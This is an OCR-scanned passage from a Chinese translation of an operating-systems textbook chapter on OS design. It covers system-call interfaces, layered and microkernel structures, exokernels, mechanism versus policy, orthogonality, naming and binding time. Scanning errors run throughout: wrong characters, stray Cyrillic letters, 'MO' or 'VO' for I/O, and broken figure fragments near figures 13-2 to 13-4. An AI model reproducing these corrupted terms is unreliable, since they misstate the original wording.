当然 ， 试 图 拥有 一 个 调用 来 处 理 每 一 种 可 能 的 情况 很 可 能 难以 控制 。 在 UNIX 中 ， 创 建 一 个 进程 需 
要 两 个 调用 : fork 然 后 是 exec， 前 者 不 需要 参数 ， 后 者 具有 3 个 参数 。 相 反 ， 创 建 一 个 进程 的 Win32 АРІ 
调用 CreateProcess 具 有 10 个 参数 ， 其 中 一 个 参数 是 指向 一 个 结构 的 指针 ， 该 结构 具有 另外 18 个 参数 。 

很 入 以 前 ， 有 人 曾经 问 过 这 样 的 问题 :“ 如 果 我 们 省 略 了 这 些 东 西 会 不 会 发 生 可 怕 的 事情 ? ”诚实 
的 回答 应 该 是 :“ 在 某 些 情况 下 程序 员 可 能 不 得 不 做 更 多 的 工作 以 达到 特定 的 效果 ， 但 是 最 终 的 结果 将 
会 是 一 个 更 简单 、 更 小 巧 并 且 更 可 靠 的 操作 系统 。” 当 然 ， 主 张 10+18 个 参数 版 本 的 人 可 能 会 说 ;“ 但 是 
用 户 喜 欢 所 有 这 些 特性 ”对 此 的 反驳 可 能 会 是 :“ 他 们 更 加 喜欢 使 用 很 少 内 存 并 且 从 来 不 会 崩溃 的 系统 。” 
在 更 多 功能 性 和 更 多 内 存 代价 之 间 的 权衡 是 显而易见 的 ， 并 且 可 以 从 价格 上 来 衡量 (因为 内 存 的 价格 是 
已 知 的 ) 。 然 而 ， 每 年 由 于 某 些 特性 而 增加 的 崩溃 次 数 是 难于 估算 的 ， 并 且 如 果 用 户 知道 了 隐藏 的 代价 
是 否 还 会 做 出 同样 的 选择 呢 ? 这 一 影响 可 以 在 Tanenbaum 软 件 第 一 定律 中 做 出 总 结 : 

添加 更 多 的 代码 就 是 添加 更 多 的 程序 错误 。 
添加 更 多 的 功能 特性 就 要 添加 更 多 的 代码 ， 因 此 就 要 添加 更 多 的 程序 错误 。 相 信 添 加 新 的 功能 特性 而 不 
会 添加 新 的 程序 错误 的 程序 员 要 么 是 计算 机 的 生 手 ， 要 么 就 是 相信 政 齿 仙女 〈 据 说 会 在 儿童 掉 落 在 酌 边 
的 幼 齿 旁 放 上 钱财 的 仙女 ) 正在 那里 监视 着 他 们 。 

简单 不 是 设计 系统 调用 时 出 现 的 惟一 问题 。 一 个 重要 的 考虑 因素 是 Lampson (1984) 的 口号 ; 
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不 要 隐藏 能 力 。 

如 果 硬件 具有 极其 高 效 的 方法 做 某 事 ， 它 就 应 该 以 简单 的 方法 展露 给 程序 员 ， 而 不 应 该 掩埋 在 某 些 其 他 
抽象 的 内 部 。 抽 象 的 目的 是 隐藏 不 合 需要 的 特性 ， 而 不 是 隐藏 值得 需要 的 特性 。 例 如 ， 假 设 硬件 具有 一 
种 特殊 的 方法 以 很 高 的 速度 在 屏幕 上 (也 就 是 视频 RAM 中 ) 移动 大 型 位 图 ， 正 确 的 做 法 是 要 有 一 个 新 
的 系统 调用 能 够 得 到 这 一 机 制 ， 而 不 是 只 提供 一 种 方法 将 视频 RAM 读 到 内 存 中 并 且 再 将 其 写 回 。 新 的 
系统 调用 应 该 只 是 移动 位 而 不 做 其 他 事情 。 如 果 系 统 调用 速度 很 快 ， 用 户 总 可 以 在 其 上 建立 起 更 加 方便 
的 接口 。 如 果 它 的 速度 慢 ， 没 有 人 会 使 用 它 。 

另 一 个 设计 问题 是 面向 连接 的 调用 与 无 连接 的 调用 。 读 文件 的 标准 UNIX 系 统 调用 和 Win32 系 统 调 
用 是 面向 连接 的 。 首 先 你 要 打开 一 个 文件 ， 然 后 读 它 ， 最 后 关闭 它 。 某 些 远程 文件 访问 协议 也 是 面向 连 
接 的 。 例 如 ， 要 使 用 FTP， 用 户 首先 要 登录 到 远程 计算 机 上 ， 读 文件 ， 然 后 注销 。 

另 一 方面 ， 某 些 远程 文件 访问 协议 是 无 连接 的 ， 例 如 Web 协 议 (HTTP)。 要 读 一 个 Web 页 面 你 只 要 
请 求 它 就 可 以 了 ， 不 存在 事先 建立 连接 的 需要 (TCP 连接 是 需要 的 ,但 是 这 处 于 协议 的 低层 ,访问 Web 
本 身 的 HTTP 协 议 是 无 连接 的 )。 

任何 面向 连接 的 机 制 与 无 连接 的 机 制 之 间 的 权衡 在 于 建立 连 接 的 机 制 ( 例 如 打开 文件 ) 要 求 的 额外 
开销 ， 以 及 在 后 续 调 用 (可 能 很 多 ) 中 避免 进行 连接 所 带 来 的 好 处 。 对 于 单机 上 的 文件 VO 而 言 ， 由 于 
建立 连接 的 代价 很 低 ， 标 准 的 方法 (首先 打开 ,然后 使 用 ) 可 能 是 最 好 的 方法 。 对 于 远程 文件 系统 而 言 ， 
两 种 方法 都 可 以 采用 。 

与 系统 调用 接口 有 关 的 另 一 个 问题 是 接口 的 可 见 性 。POSIX 强 制 的 系统 调用 列表 很 容易 找到 。 所 有 
UNIX 系 统 都 支持 这 些 系统 调用 ， 以 及 少数 其 他 系统 调用 ， 但 是 完全 的 列表 总 是 公开 的 。 相 反 ， 
Microsoft 从 未 将 Windows Vista 系 统 调用 列表 公开 。 作 为 替代 ，Win32 API 和 其 他 API 被 公开 了 ， 但 是 这 
些 API 包 含 大 量 的 库 调用 〈 超 过 10 000 个 )， 只 有 很 少数 是 真正 的 系统 调用 。 将 所 有 系统 调用 公开 的 论据 
是 可 以 让 程序 员 知 道 什么 是 代价 低廉 的 (在 用 户 空间 执行 的 函数 )， 什 么 是 代价 昂贵 的 【内核 调用 )。 不 
将 它们 公开 的 论据 是 这 样 给 实现 提供 了 灵活 性 ， 无 须 破坏 用 户 程序 就 可 以 修改 实际 的 底层 系统 调用 ， 以 
便 使 其 工作 得 更 好 。 


13.3 实现 

看 过 用 户 界面 和 系统 调用 接口 后 ， 现 在 让 我 们 来 看 一 看 如 何 实现 一 个 操作 系统 。 在 下 面 8 个 小 节 ， 
我 们 将 分 析 涉及 实现 策略 的 某 些 一 般 的 概念 性 问题 。 在 此 之 后 ， 我 们 将 看 一 看 某 些 低层 技术 ， 这 些 技术 
通常 是 十 分 有 益 的 。 


13.3.1 系统 结构 

实现 必须 要 做 出 的 第 一 个 决策 可 能 是 系统 结构 应 该 是 什么 。 我 们 在 1.7 节 分 析 了 主要 的 可 能 性 ， 在 
这 里 要 重 温 一 下 。 一 个 无 结构 的 单 块 式 设计 实际 上 并 不 是 一 个 好 主意 ， 除 非 可 能 是 用 于 电 冰 箱 中 的 微小 
的 操作 系统 ， 但 是 即使 在 这 里 也 是 可 争论 的 。 

1. 分 层 系 统 

多 年 以 来 很 好 地 建立 起 来 的 一 个 合理 的 方案 是 分 层 系统 。Dijkstra 的 THE 系 统 (图 1-25) 是 第 一 个 
分 层 操作 系统 。UNIX 和 Windows Vista 也 具有 分 层 结构 ， 但 是 在 这 两 个 系统 中 分 层 更 是 一 种 试图 描述 系 
统 的 方法 ， 而 不 是 用 于 建立 系统 的 真正 的 指导 原则 。 

对 于 一 个 新 系统 ， 选 择 走 这 一 路 线 的 设计 人 员 应 该 首先 非常 仔细 地 选择 各 个 层次 ， 并 且 定义 每 个 晨 
次 的 功能 。 底 层 应 该 总 是 试图 隐藏 硬件 最 糟糕 的 特异 性 ， 就 像 图 11-7 中 HAL 所 做 的 那样 。 或 许 下 一 层 应 
该 处 理 中 断 、 上 下 文 切换 以 及 MMU， 从 而 在 这 一 层 的 代码 大 部 分 是 与 机 器 无 关 的 。 在 这 一 层 之 上 ， 不 
同 的 设计 人 员 可 能 具有 不 同 的 口味 (与 偏好 )。 一 种 可 能 性 是 让 第 3 层 管理 线程 ， 包 括 调度 和 线程 间 同 步 ， 
如 图 13-2 所 示 。 此 处 的 思想 是 从 第 4 层 开始 ， 我 们 拥有 适当 的 线程 ， 这 些 线程 可 以 被 正常 地 调度 ， 并 且 
使 用 标准 的 机 制 (йлн. Жж) 进行 同步。 

在 第 4 层 ， 我 们 可 能 会 找到 设备 驱动 程序 ， 每 个 设备 驱动 程序 作为 一 个 单独 的 线程 而 运行 ， 具 有 自 
己 的 状态 、 程 序 计数 器 、 寄 存 器 等 ， 可 能 (但 是 不 必要 ) 处 于 内 核 地 址 空间 内 部 。 这 样 的 设计 可 以 大 大 
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简化 MO 结 构 ， 因 为 当 一 个 中 断 发 生 时 ， 它 就 可 以 转化 成 在 一 个 互 扩 量 上 的 unlock， 并 且 调用 调度 器 以 


(HEERE) 调度 重新 就 绪 的 线程 ， 而 该 线程 曾 阻塞 在 
该 互 斥 量 之 上 。MINIX 使 用 了 这 一 方案 ， 但 是 在 
UNIX、Linux 和 Windows Vista 中 ， 中 断 处 理 程序 运 
行 在 一 类 “无 主 地 带 ” 中 ， 而 不 是 作为 适当 的 线程 
可 以 被 调度 、 挂 起 等 。 由 于 任何 一 个 操作 系统 的 大 
多 数 复杂 性 在 于 MO 之 中 ， 使 其 更 加 易于 处 理 和 封装 


层次 
хик] e [хт] 


虚拟 内 存 
EA 


#[#@[-[ | 


线程 、 线 程 调度 、 线 程 同 步 
中 断 处 理 、 上 下 文 切换 、MMU 


的 任何 技术 都 是 值得 考虑 的 。 3 

在 第 4 层 之 上 ， 我 们 预计 会 找到 虚拟 内 存 、 一 个 ? 
或 多 个 文件 系统 以 及 系统 调用 接口 。 如 果 虚 拟 内 存 处 1 ТТ 
于 比 文件 系统 更 低 的 层次 ， 那 么 数据 块 高 速 缓存 就 可 
以 分 页 出 去 ， 使 虚拟 内 存 管理 器 能 够 动态 地 决定 在 用 图 13-2 现代 分 层 操作 系统 的 一 种 可 能 的 设计 
户 页 面 和 内 核 页 面包 括 高 速 缓存 ) 之 间 应 该 怎样 划分 实际 内 存 。Windows Vista 就 是 这 样 工作 的 。 

2. 外 内 核 

虽然 分 层 在 系统 设计 人 员 中 间 具 有 支持 者 ,但 是 还 有 另 一 个 阵营 恰恰 持 有 相反 的 观点 (Engler 等 人 
1995)。 他 们 的 观点 基于 痛 到 端的 论据 (end-to-end argument) (Saltzer 等 人 ，1984)。 这 一 概念 说 的 是 ， 
如 果 革 件 事情 必须 由 用 户 程序 本 身 去 完成 ， 在 一 个 较 低 的 层次 做 同样 的 事情 就 是 浪费 。 

考虑 该 原理 对 于 远程 文件 访问 的 一 个 应 用 。 如 果 一 个 系统 担心 数据 在 传送 中 被 破坏 ， 它 应 该 安排 
个 文件 在 写 的 时 候 计算 校 验 和 ， 并 且 校 验 和 与 文件 一 同 存放 。 当 一 个 文件 通过 网 络 从 源 盘 传送 到 目标 进 
程 时 ， 校 验 和 也 被 传送 ， 并 且 在 接收 端 重新 计算 。 如 果 两 者 不 一 致 文 件 将 被 丢弃 并 且 重 新 传送 。 

校 验 比 使 用 可 靠 的 网 络 协 议 更 加 精确 ， 因 为 除了 位 传送 错误 以 外 ， 它 还 可 以 捕获 磁盘 错误 、 内 存 错 
误 、 路 由 器 中 的 软件 错误 以 及 其他 错误 。 端 到 端的 论据 宣称 使 用 一 个 可 靠 的 网 络 协议 是 不 必要 的 ， 因 为 
端点 (接收 进程 ) 拥有 足够 的 信息 以 验证 文件 本 身 的 正确 性 。 在 这 一 观点 中 ， 使 用 可 靠 的 网 络 协议 的 惟 
一 原因 是 为 了 效率 ， 也 就 是 说 ， 更 早 地 捕获 与 修复 传输 错误 。 

端 到 端的 论据 可 以 扩展 到 几乎 所 有 操作 系统 。 它 主张 不 要 让 操作 系统 做 用 户 程序 本 身 可 以 做 的 任何 
事情 。 例 如 ， 为 什么 要 有 一 个 文件 系统 ?只 要 让 用 户 以 一 种 受 保护 的 方式 读 和 写 原始 磁盘 的 一 个 部 分 就 
可 以 了 。 当 然 ， 大 多 数 用 户 喜 欢 使 用 文件 ， 但 是 端 到 端的 论据 宣称 ， 文 件 系统 应 该 是 与 需要 使 用 文件 的 
任何 程序 相 链 接 的 库 过 程 。 这 一 方案 使 不 同 的 程序 可 以 拥有 不 同 的 文件 系统 。 这 一 论证 线索 表明 操作 系 
统 应 该 做 的 全 部 事情 是 在 竞争 的 用 户 之 间 安 全 地 分 配 资源 (例如 CPU 和 磁盘 ) 。Exokernel 是 一 个 根据 端 
到 端的 论据 建立 的 操作 系统 (Engler 等 人 ，1995)。 

3. 基于 微 内 核 的 客户 -服务 器 系统 

在 让 操作 系统 做 每 件 事情 和 让 操作 系统 什么 也 不 做 之 间 的 折 吉 是 让 操作 系统 做 一 点 事情 。 这 一 设计 
导致 微 内 核 的 出 现 ， 它 让 操作 系统 的 大 部 分 作为 用 户 级 的 服务 器 进程 而 运行 ， 如 图 13-3 所 示 。 在 所 有 设 
计 中 这 是 最 模块 化 和 最 灵活 的 。 在 灵活 性 上 的 极限 是 让 每 个 设备 驱动 程序 也 作为 一 个 用 户 进程 而 运行 
从 而 完全 保护 内 核 和 其 他 驱动 程序 ， 但 是 让 设备 驱动 程序 运行 在 内 核 会 增加 模块 化 程度 。 


Р 进程 | 进程 |... | 文件 Т 
aran] га eren] EA | 服务 器 | 服务 器 | 用 户 态 
| wit 
客户 通过 向 服务 
器 进程 发 送信 息 
来 获得 服务 


图 13-3 基于 微 内 核 的 客户 -服务 器 计算 
当 设 备 驱 动 程序 运行 在 内 核 态 时 ， 可 以 直接 访问 硬件 设备 寄存 器 ， 否 则 需要 某 种 机 制 以 提供 这 样 的 
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访问 。 如 果 硬 件 允许 ， 可 以 让 每 个 驱动 程序 进程 仅 访问 它 需要 的 那些 MO 设备 。 例 如 ， 对 于 内 存 映 射 的 
IO， 每 个 驱动 程序 进程 可 以 拥有 页 面 将 它 的 设备 映射 进来 ， 但 是 没有 其 他 设备 的 页 面 。 如 果 LO 端 口 空 
闻 可 以 部 分 地 加 以 保护 ， 就 可 以 保证 只 有 相应 的 正确 部 分 对 每 个 驱动 程序 可 用 。 

即使 没有 硬件 帮助 可 用 ， 仍 然 可 以 设法 使 这 一 思想 可 行 。 此 时 需要 的 是 一 个 新 的 系统 调用 ， 该 系统 
调用 仅 对 设备 驱动 程序 进程 可 用 ， 它 提供 一 个 (端口 ， 取 值 ) 对 列表 。 内 核 所 做 的 是 首先 进行 检查 以 了 
解 进程 是 否 拥有 列表 中 的 所 有 端口 ， 如 果 是 ， 它 就 将 相应 的 取 值 复制 到 端口 以 发 起 设备 VO。 类 似 的 调 
用 可 以 用 一 种 受 保护 的 方式 读 UO 端 口 。 

这 一 方法 使 设备 驱动 程序 避免 了 检查 (并 且 破坏 ) 内 核 数据 结构 ， 这 (在 很 大 程度 上 ) 是 一 件 好 事 
情 。 一 组 类 似 的 调用 可 以 用 来 让 驱动 程序 进程 读 和 写 内 核 表格 ， 但 是 仅 以 一 种 受 控 的 方式 并 且 需 要 内 核 
的 批准 。 

这 一 方法 的 主要 问题 ， 并 且 一 般 而 言 是 针对 微 内 核 的 主要 问题 ， 是 额外 的 上 下 文 切换 导致 性 能 受到 
影响 。 然 而 ， 微 内 核 上 的 所 有 工作 实际 上 是 许多 年 前 当 CPU 还 非常 缓慢 的 时 候 做 的 。 如 今 ， 用 尽 CPU 的 
处 理 能 力 并 且 不 能 容忍 微小 性 能 损失 的 应 用 程序 是 十 分 稀少 的 。 毕 竞 ， 当 运行 一 个 字 处 理 器 或 Web 浏 览 
器 时 ，CPU 可 能 有 95% 的 时 间 是 空闲 的 。 如 果 一 个 基于 微 内 核 的 操作 系统 将 一 个 不 可 靠 的 3GHz 的 系统 转 
变 为 一 个 可 靠 的 2.5GHz 的 系统 ， 可 能 很 少 有 用 户 会 抱怨 。 和 毕 竞 ， 仅 仅 在 几 年 以 前 当 他 们 得 到 具有 1GHz 
的 速度 (就 当时 而 言 十 分 惊人 ) 的 系统 时 ， 大 多 数 用 户 是 相当 快乐 的 。 

4. 可 扩展 的 系统 

对 于 上 面 讨论 的 客户 -服务 器 系统 ， 思 想 是 让 尽 可 能 多 的 东西 脱离 内 核 。 相 反 的 方法 是 将 更 多 的 模 
块 放 到 内 核 中 ， 但 是 以 一 种 “ 受 保护 的 ”方式 。 当 然 ， 这 里 的 关键 字 是 “ 受 保护 的 "。 我 们 在 9.5.6 节 中 研 
究 了 某 些 保护 机 制 ， 这 些 机 制 最初 打 算 用 于 通过 Internet 引 入 小 程序 ， 但 是 对 于 将 外 来 的 代码 插入 到 内 核 
中 的 过 程 同样 适用 。 最 重要 的 是 沙 鳃 技术 和 代码 签名 ， 因 为 解释 对 于 内 核 代码 来 说 实际 上 是 不 可 行 的 。 

当然 ， 可 扩展 的 系统 自身 并 不 是 构造 一 个 操作 系统 的 方法 。 然 而 ， 通 过 以 一 个 只 是 包含 保护 机 制 的 
最 小 系统 为 开端 ， 然 后 每 次 将 受 保护 的 模块 添加 到 内 核 中 ， 直 到 达到 期 望 的 功能 ， 对 于 的 应 用 而 言 
一 个 最 小 的 系统 就 建立 起 来 了 。 按 照 这 一 观点 ， 对 于 每 一 个 应 用 ， 通 过 仅仅 包含 它 所 需要 的 部 分 ， 就 可 
以 裁剪 出 一 个 新 的 操作 系统 。Paramecium 就 是 这 类 系统 的 一 个 实例 (Van Doorn, 2001) 。 

5. 内 核 线程 

此 处 ， 另 一 个 相关 的 问题 是 系统 线程 ， 无 论 选 择 哪 种 结构 模型 。 有 时 允许 存在 与 任何 用 户 进程 相隔 
离 的 内 核 线程 是 很 方便 的 。 这 些 线程 可 以 在 后 台 运 行将 及 页 面 写 入 磁盘 ， 在 内 存 和 磁盘 之 间 交 换 进程 
如 此 等 等 。 实 际 上 ， 内 核 本 身 可 以 完全 由 这 样 的 线程 构成 ， 所 以 当 一 个 用 户 发 出 系统 调用 时 ， 用 户 的 线 
程 并 不 是 在 内 核 模式 中 运行 ， 而 是 阻塞 并 且 将 控制 传 给 一 个 内 核 线程 ， 该 内 核 线程 接管 控制 以 完成 工作 。 

除了 在 后 台 运行 的 内 核 线程 以 外 ， 大 多 数 操作 系统 还 要 启动 许多 守护 进程 。 虽 然 这 些 守护 进程 不 是 
操作 系统 的 组 成 部 分 ， 但 是 它们 通常 执行 “系统 ”类 型 的 活动 。 这 些 活动 包括 接收 和 发 送 电子 邮件 ， 并 
且 对 远程 用 户 各 种 各 样 的 请 求 进行 服务 ， 例 如 FTP 和 Web 网 页 


13.3.2 机 制 与 策略 

另 一 个 有 助 于 体系 结构 一 致 性 的 原理 是 机 制 与 策略 的 分 离 ， 该 原理 同时 还 有 助 于 使 系统 保持 小 型 和 
良好 的 结构 。 通 过 将 机 制 放 入 操作 系统 而 将 策略 留 给 用 户 进程 ， 即 使 存在 改变 策略 的 需要 ， 系 统 本 身 也 
可 以 保持 不 变 。 即 使 策略 模块 必须 保留 在 内 核 中 ， 如 果 可 能 ， 它 也 应 该 与 机 制 相 隔离 ， 这 样 策略 模块 中 
的 变化 就 不 会 影响 机 制 模块 。 

为 了 使 策略 与 机 制 之 间 的 划分 更 加 清晰 ， 让 我 们 考虑 两 个 现实 世界 的 例子 。 第 一 个 例子 ， 考 虑 一 家 
大 型 公司 ， 该 公司 拥有 负责 向 员工 发 放 薪水 的 工资 部 门 。 该 部 门 拥有 计算 机 、 软 件 、 空 白 支票、 与 银行 
的 契约 以 及 更 多 的 机 制 ， 以 便 准 确 地 发 出 新 水。 然而， 策略 一 确定 谁 将 获得 多 少 厅 水 一 一 是 完全 与 机 
制 分 开 的 ， 并 且 是 由 管理 部 门 决 定 的 。 工 资 部 门 只 是 做 他 们 被 吟 只 做 的 事情 。 

第 二 个 例子 ， 考 虑 一 家 饭店 。 它 拥有 提供 餐饮 的 机 制 ， 包 括 餐桌 、 餐 具 、 服 务 员 、 充 满 设 备 的 厨房 
与 信用 卡 公司 的 契约 ， 如 此 等 等 。 策 略 是 由 厨师 长 设 定 的 ， 也 就 是 说 ， 厨 师长 决定 菜单 上 有 什么 。 如 果 
厨师 长 决定 撤 掉 豆腐 换 上 牛排 ， 那 么 这 一 新 的 策略 可 以 由 现 有 的 机 制 来 处 理 。 
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现在 让 我 们 考虑 某 些 操作 系统 的 例子 。 首 先 考虑 线程 调度 。 内 核 可 能 拥有 一 个 优先 级 调度 器 ， 具 有 
k 个 优先 级 。 机 制 是 一 个 数组 ， 以 优先 级 为 索引 ， 如 图 10-11 或 图 11-19 所 示 。 每 个 数组 项 是 处 于 该 优先 级 
的 就 绪 线程 列表 的 表 头 。 调 度 器 只 是 从 最 高 优先 级 到 最 低 优先 级 搜索 数组 ， 选 中 它 找到 的 第 一 个 线程 。 
策略 是 设 定 优先 级 。 系 统 可 能 具有 不 同 的 用 户 类 别 ， 每 个 类 别 拥有 不 同 的 优先 级 。 它 还 可 能 允许 用 户 进 
程 设置 其 线程 的 相对 优先 级 。 优 先 级 可 能 在 完成 LO 之 后 增加 ， 或 者 在 用 完 时 间 配 额 之 后 降低 。 还 有 众 
多 的 其 他 策略 可 以 苯 循 ， 但 是 此 处 的 中 心思 想 是 设置 策略 与 执行 之 间 的 分 离 。 

第 二 个 例子 是 分 页 。 机 制 涉及 到 MMU 管 理 ， 维 护 占用 页 面 与 空闲 页 面 的 列表 ， 以 及 用 来 将 页 面 移 人 
磁盘 或 者 移出 磁盘 的 代码 。 策 略 是 当 页 面 故障 发 生 时 决定 做 什么 ， 它 可 能 是 局 部 的 或 全 局 的 ， 基 于 LRU 
的 或 基于 FIFO 的 ， 或 者 是 别 的 东西 ， 但 是 这 一 算法 可 以 (并 且 应 该 ) 完全 独立 于 实际 管理 页 面 的 机 制 。 

第 三 个 例子 是 允许 将 模块 装载 到 内 核 之 中 。 机 制 关心 的 是 它们 如 何 被 插入 、 如 何 被 链接 、 它 们 可 以 
发 出 什么 调用 ， 以 及 可 以 对 它们 发 出 什么 调用 。 策 略 是 确定 允许 谁 将 模块 装载 到 内 核 之 中 以 及 装 裁 哪些 
模块 。 也 许 只 有 超级 用 户 可 以 装载 模块 ， 也 许 任何 用 户 都 可 以 装载 被 适当 权威 机 构 数 字 签 名 的 模块 。 


13.3.3 正 交 性 

良好 的 系统 设计 在 于 单独 的 概念 可 以 独立 地 组 合 。 例 如 ， 在 C 语 言 中 ， 存 在 基本 的 数据 类 型 ， 包 括 
整数 、 字 符 和 浮 点 数 ， 还 存在 用 来 组 合 数据 类 型 的 机 制 ， 包 括 数 组 、 结 构 和 联合 。 这 些 概念 独立 地 组 合 ， 
允许 拥有 整数 数组 、 字 符 数组 、 浮 点 数 的 结构 和 联合 成 员 等 。 实 际 上 ， 一 旦 定义 了 一 个 新 的 数据 类 型 ， 
如 整数 数组 ， 就 可 以 如 同一 个 基本 数据 类 型 一 样 使 用 它 ， 例 如 作为 一 个 结构 或 者 一 个 联合 的 成 员 。 独 立 
地 组 合 单独 的 概念 的 能 力 称 为 正 交 性 (orthogonality) ， 它 是 简单 性 和 完整 性 原理 的 直接 结果 。 

正 交 性 概念 还 以 各 种 各 样 的 伪装 出 现在 操作 系统 中 ，Linux 的 clone 系 统 调用 就 是 一 个 例子 ， 它 创建 
一 个 新 线程 。 该 调用 有 一 个 位 图 作为 参数 ， 它 允许 单独 地 共享 或 复制 地 址 空间 、 工 作 目录 、 文 件 描述 符 
以 及 信号 。 如 果 复 制 所 有 的 东西 ， 我 们 将 得 到 一 个 进程 ， 就 像 调用 fork 一 样 。 如 果 什 么 都 不 复制 ， 则 是 
在 当前 进程 中 创建 一 个 新 线程 。 然而， 创建 共享 的 中 间 形式 同样 也 是 可 以 的 ， 而 这 在 传统 的 UNIX 系 统 
中 是 不 可 能 的 。 通 过 分 离 各 种 特性 并 且 使 它们 正 交 ， 是 可 以 做 到 更 好 地 控制 自由 度 的 。 

正 交 性 的 另 一 个 应 用 是 Windows Vista 中 进程 概念 与 线程 概念 的 分 离 。 进 程 是 一 个 资源 容器 ， 既 不 
多 也 不 少 。 线 程 是 一 个 可 调度 的 实体 。 当 把 另 一 个 进程 的 句柄 提供 给 一 个 进程 时 ， 它 拥有 多 少 个 线程 都 
是 没有 关系 的 。 当 一 个 线程 被 调度 时 ， 它 从 属于 哪个 进程 也 是 没有 关系 的 。 这 些 概念 是 正 交 的 。 

正 交 性 的 最 后 一 个 例子 来 自 UNIX。 在 UNIX 中 ， 进 程 的 创建 分 两 步 完成 : fork 和 exec。 创 建新 的 地 
址 空间 与 用 新 的 内 存 喘 像 装载 该 地 址 空间 是 分 开 的 ， 这 就 为 在 两 者 之 间 做 一 些 事情 提供 了 可 能 (例如 处 
理 文件 描述 符 )。 在 Windows Vista 中 ， 这 两 个 步骤 不 能 分 开 ， 也 就 是 说 ， 创 建新 的 地 址 空间 与 填充 该 地 
址 空间 的 概念 不 是 正 交 的 。Linux 的 clone 加 exec 序 列 是 更 加 正 交 的 ， 因 为 存在 更 细 粒 度 的 构造 块 可 以 利 
用 。 作 为 一 般 性 的 规则 ， 拥 有 少量 能 够 以 很 多 方式 组 合 的 正 交 元 素 ， 将 形成 小 巧 、 简 单 和 精致 的 系统 。 


13.3.4 命名 

操作 系统 使 用 的 最 长 久 的 数据 结构 具有 某 种 类 型 的 名 字 或 标识 符 ， 通 过 名 字 或 标识 符 就 可 以 引用 这 
些 数据 结构 。 显 而 易 见 的 例子 有 注册 名 、 文 件 名 、 设 备 名 、 进 程 ID 等 。 在 操作 系统 的 设计 与 实现 中 ， 如 
何 构造 和 管理 这 些 名 字 是 一 个 重要 的 问题 。 

为 人 们 的 使 用 而 设计 的 名 字 是 ASCII 或 Unicode 形 式 的 字符 串 ， 并 且 通 常 是 层次 化 的 。 目 录 路 径 ， 
例如 /usr/ast/books/mos2/chap-12， 显 然 是 层次 化 的 ， 它 指出 从 根 目录 开始 搜索 的 一 个 目录 序列 。URL 也 
是 层次 化 的 。 例 如 ，www.cs.vu.nl/~ast/ 表 示 一 个 特定 国家 (nl) 的 一 所 特定 大 学 (уш) 的 一 个 特定 的 系 
(св) 内 的 一 台 特定 的 机 器 (www)。 斜 线 号 后 面 的 部 分 指出 的 是 目标 机 器 上 的 一 个 特定 的 文件 ， 在 这 种 
情形 中 ， 按 照 惯例 ， 该 文件 是 ast 主 目录 中 的 www/index.html。 注 意 URL (以 及 一 般 的 DNS 地 址 ， 包 括 电 
子 邮件 地 址 ) 是 “ 反 向 的 "， 从 树 的 底部 开始 并 且 向 上 走 ， 这 与 文件 名 有 所 不 同 ， 后 者 从 树 的 顶部 开始 
并 且 向 下 走 。 看 待 这 一 问题 的 另 一 种 方法 是 从 头 写 这 棵 树 是 从 左 开始 向 右 走 ， 还 是 从 右 开始 向 左 走 。 

命名 经 常 在 外 部 和 内 部 两 个 层次 上 实现 。 例 如 ， 文 件 总 是 具有 字符 串 名 字 供 人 们 使 用 。 此 外 ， 几 乎 总 
是 存在 一 个 内 部 名 字 由 系统 使 用 。 在 UNIX 中 ， 文 件 的 实际 名 字 是 它 的 i 节点 号 ， 在 内 部 根本 就 不 使 用 ASCII 
名 字 。 实 际 上 ， 它 甚至 不 是 惟一 的 ， 因 为 一 个 文件 可 能 具有 多 个 链接 指向 它 。 在 Windows Vista 中 ， 相 优 的 
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内 部 名 字 是 MFT 中 文件 的 索引 。 目 录 的 任务 是 在 外 部 名 字 和 内 部 名 字 之 间 提 供 映 射 ， 如 图 13-4 所 示 。 

在 许多 情况 下 〈 例 如 上 外 部 名 字 , hwstbooksimos2chap-12 
面 给 出 的 文件 名 的 例子 ) ， 内 МЕЙ. 
部 名 字 是 一 个 无 符号 整数 ， 用 
作 进入 一 个 内 部 表格 的 索引 。 
表格 -索引 名 字 的 其 他 例子 还 
有 UNIX 中 的 文件 描述 符 和 
Windows Vista 中 的 对 象 句柄 。 
注意 这 些 都 没有 任何 外 部 表 
示 ， 它 们 严格 地 被 系统 和 运行 
的 进程 所 使 用 。 一 般 而 言 ， 对 
于 当 系 统 重新 启动 时 就 会 丢失 
的 暂时 的 名 字 ， 使 用 表格 索引 是 一 个 很 好 的 主意 。 

操作 系统 经 常 支持 多 个 名 字 空 间 ， 既 在 内 部 又 在 外 部 。 例 如 ， 在 第 11 章 我 们 了 解 了 Windows Vista 
支持 的 三 个 外 部 名 字 空 间 : 文件 名 、 对 象 名 和 注册 表 名 (并且 还 有 我 们 没有 考虑 的 活动 目录 名 )。 此 外 
还 存在 着 使 用 无 符号 整数 的 数 不 清 的 内 部 名 字 空间 ， 例 如 对 象 句 柄 、MFT 项 等 。 尽 管 外 部 名 字 空 间 中 的 
名 字 都 是 Unicode 字 符 串 ， 但 是 在 注册 表 中 查寻 一 个 文件 名 是 不 可 以 的 ， 正 如 在 对 象 表 中 使 用 MFT 索 引 
是 不 可 以 的 。 在 一 个 良好 的 设计 中 ， 相 当 多 的 考虑 花 在 了 需要 多 少 个 名 字 空间 ， 每 个 名 字 空间 中 名 字 的 
语法 是 什么 ， 怎 样 分 辨 它们 ， 是 否 存在 抽象 的 和 相对 的 名 字 ， 如 此 等 等 。 


13.3.5 绑 定 的 时 机 

正如 我 们 刚刚 看 到 的 ， 操 作 系统 使 用 多 种 类 型 的 名 字 来 引用 对 象 。 有 时 在 名 字 和 对 象 之 间 的 映射 是 
固定 的 ， 但 是 有 时 不 是 。 在 后 一 种 情况 下 ， 何 时 将 名 字 与 对 象 绑 定 可 能 是 很 重要 的 。 一 般 而 言 ， 早 期 绑 
Ж (early binding) 是 简单 的 ， 但 是 不 灵活 ， 而 驹 期 绑 定 (late binding) 则 比较 复杂 ， 但 是 通常 更 加 灵活 

为 了 阐明 绑 定 时 机 的 概念 ， 让 我 们 看 一 看 某 些 现实 世界 的 例子 。 早 期 绑 定 的 一 个 例子 是 某 些 高 等 学 
校 允许 父母 在 婴儿 出 生 时 登记 和 学， 并且 预 付 当前 的 学 费 。 以 后 当 学 生长 大 到 18 岁 时 ， 学 费 已 经 全 部 付 
请， 无 论 此 刻 学 费 有 多 么 高 。 

在 制造 业 中 ， 预 先 定购 零 部 件 并 且 维持 零 部 件 的 库存 量 是 早期 绑 定 。 相 反 ， 即 时 制造 要 求 供 货 商 能 
